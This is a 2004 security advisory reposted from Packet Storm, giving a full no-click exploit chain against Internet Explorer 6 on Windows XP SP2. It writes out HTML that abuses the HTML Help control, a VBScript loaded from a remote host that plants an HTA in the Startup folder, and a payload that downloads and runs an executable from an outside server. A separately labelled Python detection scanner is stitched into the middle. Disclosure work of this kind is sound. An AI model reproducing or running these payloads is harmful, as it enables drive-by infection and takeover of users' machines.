MSXPSP2-ieEXP.txt

01 Jan 2005, reported by http-equiv (packetstormsecurity.com)

Microsoft Windows XP SP2 with Internet Explorer 6 can be fully compromised by a malicious web page, with no user action beyond visiting it.

Code
`
Did they really do a good job on service pack 2? Was it worth the
investment that's reported more than the missile defense system? All these
articles on the great achievement by Microsoft and XP SP2 really merit?
They totally forgot HTA files and HTM help files. Who knows what else.

"Microsoft SP2 team, that is unacceptable, YOU'RE FIRED." Donald Trump

http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm

Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise

Dec 21, 2004

Vulnerable  
----------  
- Microsoft Internet Explorer 6.0  
- Microsoft Windows XP Pro SP2  
- Microsoft Windows XP Home SP2  
  
  
Not Tested  
------------------------  
- Microsoft Windows 98  
- Microsoft Internet Explorer 5.x  
- Microsoft Windows 2003 Server  
  
  
  
Severity  
---------  
Critical - Remote code execution, no user intervention  
  
  
Intro  
------  
Although hundreds of millions of dollars have been spent on securing SP2,
perfection is impossible. Through the joint effort of Michael Evanchik
(http://www.michaelevanchik.com) and Paul from Greyhats Security
(http://greyhats.cjb.net), a critical exploit has been developed that can
compromise a user's system with no user interaction beyond visiting the
malicious page. It is not a vulnerability in itself; rather it chains
multiple known holes in SP2, including the Help ActiveX Control Related
Topics Zone Security Bypass Vulnerability and the Help ActiveX Control
Related Topics Cross Site Scripting Vulnerability.
  
  
  
Why Microsoft has still not patched two of these known vulnerabilities, which
have been public for almost half a year now, is beyond me.
  
  
  
  
Tech Stuff and Explanation  
--------------------------  
  
1. Create a webpage with the following code:  
  
sp2rc.htm  
---------------------------------------------------------------------  
<OBJECT id="localpage" type="application/x-oleobject"  
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%  
style="position:absolute;top:140;left:72;z-index:100;"  
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">  
<PARAM name="Command" value="Related Topics, MENU">  
<PARAM name="Button" value="Text:Just a button">  
<PARAM name="Window" value="$global_blank">  
<PARAM name="Item1"  
value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">  
</OBJECT>  
  
<OBJECT id="inject" type="application/x-oleobject"  
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%  
style="position:absolute;top:140;left:72;z-index:100;"  
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">  
<PARAM name="Command" value="Related Topics, MENU">  
<PARAM name="Button" value="Text:Just a button">  
<PARAM name="Window" value="$global_blank">  
<PARAM name="Item1"  
value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\"
src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode(62)
+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>  
  
<script>  
localpage.HHClick();  
setTimeout("inject.HHClick()",100);  
</script>  
---------------------------------------------------------------------  
  
Explanation of the above code:
The first object (id: localpage) tells hhctrl.ocx to open a help popup
window at the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm.
This file was chosen because it is treated as the local zone and it doesn't
have any script of its own to interfere. On some computers an error is shown
before the popup. This is the user's only chance to prevent the vulnerability
from working: if Internet Explorer were closed at this point, the user would
be safe.

The second object (id: inject) tells the help popup to navigate to a
javascript: URL, which executes in the popup. Thus cross-site scripting has
just taken place. A script tag that loads a remote file is written to the
page, and writehta.txt (below) is executed in the unsecured local zone.

In the script, HHClick() is used to trigger the objects automatically. This is
more effective than the previously described method, which required the user
to click a button.
  
  
2. Writehta.txt uses an ADODB recordset to write Microsoft Office.hta to the
user's startup folder. See Michael Evanchik's analysis of the drag and drop
vulnerability for an explanation of the ADODB recordset technique.

It is also reported that an ADODB recordset can be built locally, without
using an HTTP or FTP server, as shown below.
  
writehta.txt  
---------------------------------------------------------------------  
Dim Conn, rs  
Set Conn = CreateObject("ADODB.Connection")  
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _  
"Dbq=http://www.malware.com;" & _  
"Extensions=asc,csv,tab,txt;" & _  
"Persist Security Info=False"  
Dim sql  
sql = "SELECT * from foobar.txt"  
set rs = conn.execute(sql)  
set rs =CreateObject("ADODB.recordset")  
rs.Open "SELECT * from foobar.txt", conn  
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close  
conn.close  
window.close  
---------------------------------------------------------------------  
  
  
3. f00bar.txt (thanks malware for hosting this file) is the file requested
by the ADODB recordset (again, read the drag and drop analysis at
www.michaelevanchik.com for an explanation of how this works and why
f00bar.txt looks the way it does). Because there is absolutely no limit on
what you can do in an HTA file, an old yet effective method of requesting a
file and saving it to the user's hard disk is used. From that, a WScript.Shell
object is created and used to run the program. And now, ladies and gentlemen,
we have compromised the user's machine.
  
f00bar.txt  
---------------------------------------------------------------------  
"meaning less shit i had to put here"  
"<script language=vbscript> crap = """  
""": on error resume next: crap = """  
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""  
""" : o.open  
""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False :  
crap="""  
""" : o.send : crap="""  
""" : set s = createobject(""adodb.stream"") : crap="""  
""" : s.type=1 : crap="""  
""" : s.open : crap="""  
""" : s.write o.responseBody : crap="""  
""" : s.savetofile ""C:\malware.exe"",2 : crap="""  
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""  
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""  
"""</script> crap="""  
---------------------------------------------------------------------  
  
  
4. Upload hhctrl.ocx for computers that don't happen to have this control.
All XP installs seem to have it by default; some Windows 2003 installs do not
(according to Michael Evanchik).
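As an added illustration that is not part of the advisory, the following Python scanner looks for the chain that steps 1 to 4 describe: hhctrl.ocx Related Topics objects whose items point at file: or javascript: targets, script-driven HHClick() automation, a Text-driver recordset with a remote Dbq= source saved into the Startup folder, and the XMLHTTP/ADODB.Stream/WScript.Shell download-and-run sequence. The three samples are constructed from the advisory's file layouts with example.invalid placeholders, and the Finding and stage names are this example's own.

```python
import re
from dataclasses import dataclass

# Added example, not the advisory's code. CLSID of the HTML Help control (hhctrl.ocx) as quoted there.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
RISKY_SCHEMES = ("file:", "javascript:", "vbscript:")  # Related Topics targets that leave the page's zone
STARTUP_DIR = r"\start menu\programs\startup"          # compared case-insensitively


@dataclass(frozen=True)
class Finding:
    stage: str  # zone-bypass | automation | persistence | dropper
    detail: str


def _attr(tag: str, name: str) -> str:
    """Attribute value from a tag's attribute text; accepts double, single or bare quoting."""
    m = re.search(r"\b" + name + r"""\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", tag, re.I)
    return next(g for g in m.groups() if g is not None) if m else ""


def scan_html(html: str) -> list[Finding]:
    """Stage 1: hhctrl.ocx objects whose Related Topics items point at file:/javascript: targets."""
    findings = []
    for obj in re.finditer(r"<object\b(.*?)>(.*?)</object>", html, re.I | re.S):
        head, body = obj.group(1), obj.group(2)
        if HHCTRL_CLSID not in _attr(head, "classid").lower():
            continue
        oid = _attr(head, "id") or "anonymous"
        params = {_attr(p, "name").lower(): _attr(p, "value")
                  for p in re.findall(r"<param\b(.*?)>", body, re.I | re.S)}
        if "related topics" not in params.get("command", "").lower():
            continue
        for name, value in params.items():
            if name.startswith("item") and value.lower().startswith("command;"):
                scheme = value.split(";", 1)[1].strip().split(":", 1)[0].lower() + ":"
                if scheme in RISKY_SCHEMES:
                    findings.append(Finding("zone-bypass", f"{oid}: {name} -> {scheme} target"))
        # The advisory's key step: HHClick() fires the item with no user click.
        if re.search(r"\b" + re.escape(oid) + r"\s*\.\s*HHClick\s*\(", html, re.I):
            findings.append(Finding("automation", f"{oid}.HHClick() invoked from script"))
    return findings


def scan_vbscript(text: str) -> list[Finding]:
    """Stages 2-3: Text-driver recordset saved into Startup, then download-and-run."""
    flat = text.replace('""', '"').lower()  # undo the doubled quotes of the CSV-wrapped script
    findings = []
    if ("adodb.connection" in flat and "microsoft text driver" in flat
            and re.search(r"dbq=\s*(https?|ftp)://", flat)):
        findings.append(Finding("persistence", "ADODB Text Driver fed from a remote Dbq= source"))
    for m in re.finditer(r'\.save\s+"([^"]+)"', flat):
        if STARTUP_DIR in m.group(1):
            findings.append(Finding("persistence", f"recordset saved into Startup: {m.group(1)}"))
    if all(k in flat for k in ("xmlhttp", "adodb.stream", "savetofile", "wscript.shell", ".run")):
        url = re.search(r'"get"\s*,\s*"([^"]+)"', flat)
        findings.append(Finding("dropper", "XMLHTTP -> ADODB.Stream.SaveToFile -> WScript.Shell.Run"
                                f" (fetches {url.group(1) if url else 'unknown URL'})"))
    return findings


def stages(findings: list[Finding]) -> set[str]:
    """Distinct stages present; all four together is the advisory's full no-click compromise."""
    return {f.stage for f in findings}


# Constructed samples mirroring the advisory's three files, with example.invalid placeholders.
SAMPLE_HTML = r'''<OBJECT id="localpage" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%>
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>
<OBJECT id="inject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%>
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value='command;javascript:execScript("placeholder stage-2 loader")'>
</OBJECT>
<script>localpage.HHClick(); setTimeout("inject.HHClick()",100);</script>'''

SAMPLE_STAGE2 = r'''Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & "Dbq=http://example.invalid;"
Set rs = CreateObject("ADODB.recordset")
rs.Open "SELECT * from stage3.txt", Conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML'''

SAMPLE_STAGE3 = r'''"<script language=vbscript> crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://example.invalid/payload.exe"",False : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : s.type=1 : s.open : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\payload.exe"",2 : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\payload.exe"", 3, FALSE : crap="""
"""</script> crap="""'''
```

Running `scan_html(SAMPLE_HTML)` reports both objects' zone-bypass items and their HHClick() automation; the two `scan_vbscript` samples report the Startup persistence and the download-and-run chain respectively.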
  
  
Proof of Concept?  
------------------  
- http://freehost07.websamba.com/greyhats/sp2rc.htm  
  
- If an error is shown, press OK. This is normal.  
  
- Notice in your startup menu a new file called Microsoft Office.hta. When  
run, this file will download and launch a harmless executable (which  
includes a pretty neat fire animation)   
  
  
  
Vendor Recommendations  
----------------------  
- Like Michael Evanchik said in his previous analysis, Microsoft needs to  
apply XP Service Pack 2's local zone lockdown to .HTA files and HTML Help  
(chm) files as well.  
  
- This might be a little far-fetched, but it would solve a lot of problems:
take out the startup folder and only support running files at startup
through the registry. The startup folder is a major part of this
vulnerability and I can almost guarantee it will be used for another remote
compromise.
  
- Microsoft could possibly take HTA files out altogether. I have not seen  
them used for anything beyond hacking.  
  
- No vulnerability is too small or too insignificant to be taken seriously.  
Treat every vulnerability as if it could be dangerous.   
  
  
  
User Recommendations  
---------------------  
- Disable HTA files.
- Get yourself antivirus software. I recommend Symantec because once they
get their lazy asses off the couch and fix some of this stuff you will be a
lot better off.
- Disable active scripting in Internet Explorer. If nothing else, do this.
- Do not use Internet Explorer; use Mozilla Firebird (now known as Firefox,
www.mozilla.org).
  
  
  
Credit  
------  
Paul from Greyhats  
Michael Evanchik  
Http equiv (thanks for allowing me to use your server for f00bar.txt)  
  
  
Greets  
------  
- Liu Die Yu (all the work you've done is amazing)  
  
  
Contact  
-------  
[email protected]  
http://greyhats.cjb.net  
  
Note  
-----  
Greyhats is becoming bigger and is in need of an upgrade. If anyone is  
interested in donating some webspace and a domain name I would be very  
appreciative. Contact me so that we may work something out :)  
  
  
  
  
  
Michael Evanchik  
  
Relationship1  
  
p: 914-921-4400  
  
f: 914-921-6007  
  
mailto:[email protected]  
  
web: http://www.relationship1.com  
  
  
  
  
  
  
`
